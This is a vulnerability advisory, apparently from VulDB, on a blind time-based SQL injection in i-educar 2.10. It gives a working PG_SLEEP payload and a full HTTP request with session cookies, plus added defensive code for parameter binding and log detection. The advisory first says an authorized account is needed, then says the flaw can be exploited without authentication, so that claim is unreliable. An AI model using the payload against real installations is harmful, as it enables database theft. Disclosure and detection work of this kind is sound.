**Title:** Portabilis i-educar 2.10 SQL Injection

**Description:**

# SQL Injection (Blind Time-Based) Vulnerability in `id` Parameter on `/module/AreaConhecimento/edit` Endpoint
---
## Summary
A SQL Injection vulnerability was identified in the `/module/AreaConhecimento/edit` endpoint of the _i-educar_ application, specifically in the `id` parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.
---
## Details
**Vulnerable Endpoint:** `/module/AreaConhecimento/edit`
**Parameter:** `id`
To reach the vulnerable functionality, it is necessary to navigate to:
**Escola > Cadastros > Tipos > Regras de Avaliação > Listagem de áreas de conhecimento**.
Additionally, exploiting this vulnerability requires an account with permissions to **create/list the "Escola" menu**.
The application fails to properly validate and sanitize user input in the `id` parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.
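The defect class described above, with the two defences that close it, as an added example written for this page (not code from i-educar; the project's real handler and schema are not shown on the page). An in-memory SQLite table stands in for the areas-of-knowledge table, so the table name `area_conhecimento`, its columns and every function name here are assumptions. SQLite has no `PG_SLEEP`, so the injected subquery is rejected by the parser instead of sleeping; the point of the vulnerable path is that the payload reaches the SQL parser at all, whereas binding it as a parameter compares it as data and validating it as an integer rejects it before any query runs.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The advisory's request target; parse_qs URL-decodes it ('+' becomes a space).
REQUEST_TARGET = (
    "/module/AreaConhecimento/edit?id=3'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))"
    "+AND+'WqeR'='WqeR"
)

# Constructed stand-in rows; the real i-educar schema is not on the page, so the
# table and column names below are assumptions made for this example.
SAMPLE_ROWS = [(1, "Linguagens"), (2, "Matemática"), (3, "Educação Infantil")]


def id_from_target(target):
    """Extract the raw `id` query parameter exactly as the application receives it."""
    return parse_qs(urlsplit(target).query)["id"][0]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE area_conhecimento (id INTEGER PRIMARY KEY, nome TEXT)")
    conn.executemany("INSERT INTO area_conhecimento VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, raw_id):
    """The defect: the raw parameter is spliced into the SQL text, so the payload's
    quote closes the literal and everything after it is parsed as SQL."""
    sql = "SELECT nome FROM area_conhecimento WHERE id = '" + raw_id + "'"
    try:
        return {"sql": sql, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # SQLite rejects the unknown PG_SLEEP; PostgreSQL would evaluate it and
        # sleep, which is the observable signal the advisory's PoC relies on.
        return {"sql": sql, "rows": [], "error": str(exc)}


def bound_lookup(conn, raw_id):
    """Parameter binding: the value travels separately from the statement text,
    so the payload is compared as a string and matches no row."""
    return conn.execute(
        "SELECT nome FROM area_conhecimento WHERE id = ?", (raw_id,)
    ).fetchall()


def parse_id(raw_id):
    """Validation at the boundary: `id` is a positive integer or the request is rejected."""
    if raw_id is None or not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError("id must be a positive integer")
    return int(raw_id)


def safe_lookup(conn, raw_id):
    """Validation plus binding: the two layers the vulnerable handler lacks."""
    return conn.execute(
        "SELECT nome FROM area_conhecimento WHERE id = ?", (parse_id(raw_id),)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    raw = id_from_target(REQUEST_TARGET)
    print("raw id:", raw)
    print("vulnerable:", vulnerable_lookup(db, raw))
    print("bound:", bound_lookup(db, raw))
    try:
        safe_lookup(db, raw)
    except ValueError as e:
        print("validated:", e)
```

Both defences are needed in practice: binding alone stops the injection, but validation also gives the handler a clean place to return a 400 and a log line instead of silently returning an empty result.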
---
## PoC
**Payload:**
`'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR`
This payload triggers a **5-second delay** in the server response, demonstrating that the parameter is vulnerable to blind time-based SQL injection.
**Example Request:**
```http
POST /module/AreaConhecimento/edit?id=3'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/module/AreaConhecimento/edit?id=3
Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=iIw1P9Yxwm9hsXZb74mgDwRm5ltCSdmSQuuURvmG
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

tipoacao=Editar&id=3&instituicao=1&nome=Educa%C3%A7%C3%A3o+Infantil&secao=&ordenamento_ac=
```
The screenshot of the response (not reproduced here) shows the increased server response time, confirming that the injected SQL command was executed.
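For the detection side of the PoC above, here is an added example (written for this page, not part of the advisory or of i-educar) that scans web-server access-log lines for the two signals this finding leaves behind: a database sleep primitive inside the `id` parameter, and a response time far above the endpoint's baseline. The log lines are constructed for the example, in an assumed format that ends with the response time in milliseconds; the 4000 ms threshold is an assumed baseline, not a value from the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the page). Assumed format: client, ident,
# user, [timestamp], "request line", status, response time in milliseconds.
SAMPLE_LOG = [
    '127.0.0.1 - - [17/Aug/2025:19:30:01 -0300] "POST /module/AreaConhecimento/edit?id=3 HTTP/1.1" 200 118',
    '127.0.0.1 - - [17/Aug/2025:19:30:35 -0300] "POST /module/AreaConhecimento/edit?id=3\'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+\'WqeR\'=\'WqeR HTTP/1.1" 200 5142',
    '127.0.0.1 - - [17/Aug/2025:19:31:02 -0300] "GET /module/AreaConhecimento/edit?id=4 HTTP/1.1" 200 97',
    '127.0.0.1 - - [17/Aug/2025:19:31:40 -0300] "GET /module/AreaConhecimento/edit?id=abc HTTP/1.1" 400 12',
]

LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<ms>\d+)$'
)
# Database sleep/delay functions; one of these inside a request parameter is a
# strong indicator of time-based probing regardless of how the rest is encoded.
TIME_FUNC_RE = re.compile(r"\b(pg_sleep|sleep|benchmark)\s*\(", re.I)
# Assumed baseline for this endpoint: anything at or above this is "slow".
SLOW_MS = 4000


def parse_line(line):
    """Parse one access-log line into the fields the rules need, or None if it does not match."""
    m = LOG_RE.search(line)
    if not m:
        return None
    target = m.group("target")
    params = parse_qs(urlsplit(target).query)  # URL-decodes, so '+' becomes a space
    return {
        "method": m.group("method"),
        "path": urlsplit(target).path,
        "id": params.get("id", [None])[0],
        "status": int(m.group("status")),
        "ms": int(m.group("ms")),
    }


def classify(rec):
    """Return the list of rule names that fire for one parsed record (empty if benign)."""
    reasons = []
    raw_id = rec["id"]
    if raw_id is not None:
        if TIME_FUNC_RE.search(raw_id):
            reasons.append("time_function")
        if not re.fullmatch(r"[0-9]+", raw_id):
            reasons.append("non_numeric_id")  # the parameter is documented as a numeric id
    if rec["ms"] >= SLOW_MS:
        reasons.append("slow_response")
    return reasons


def scan_log(lines):
    """Run the rules over every line; return findings with line number, id value and reasons."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"line": n, "id": rec["id"], "ms": rec["ms"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: id={f['id']!r} ms={f['ms']} reasons={f['reasons']}")
```

The `non_numeric_id` rule is the durable one: it fires on any malformed value for a parameter the application only ever uses as an integer, so it keeps working when a probe avoids the well-known function names. The timing rule needs the server to log request duration (for example Apache's `%D` or nginx's `$request_time`), which is worth enabling on an application that talks to a database.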
---
## Impact
- **Unauthorized data access:** Reading sensitive information such as credentials, personal data, or configuration details
- **Database enumeration:** Extracting database schema, tables, and column details
- **Data manipulation:** Adding, modifying, or deleting database records
- **Denial of Service (DoS):** Using time-based queries to impact system availability
- **Potential escalation to RCE:** If combined with other vulnerabilities and specific database features
This vulnerability affects all users who can interact with the vulnerable parameter, and it can be exploited remotely without prior authentication if the endpoint is exposed.

**Source:** https://github.com/marcelomulder/CVE/blob/main/i-educar/SQL%20Injection%20(Blind%20Time-Based)%20Vulnerability%20in%20%60id%60%20Parameter%20on%20%60.module.AreaConhecimento.edit%60%20Endpoint.md

**User:** marceloQz (UID 87549)

**Submission:** 20.08.2025 16:33 (10 months ago)

**Moderation:** 29.08.2025 12:57 (9 days later)

**Status:** Accepted

**VulDB Entry:** 321898 [Portabilis i-Educar up to 2.10 Listagem de áreas de conhecimento Page edit ID SQL Injection]

**Points:** 20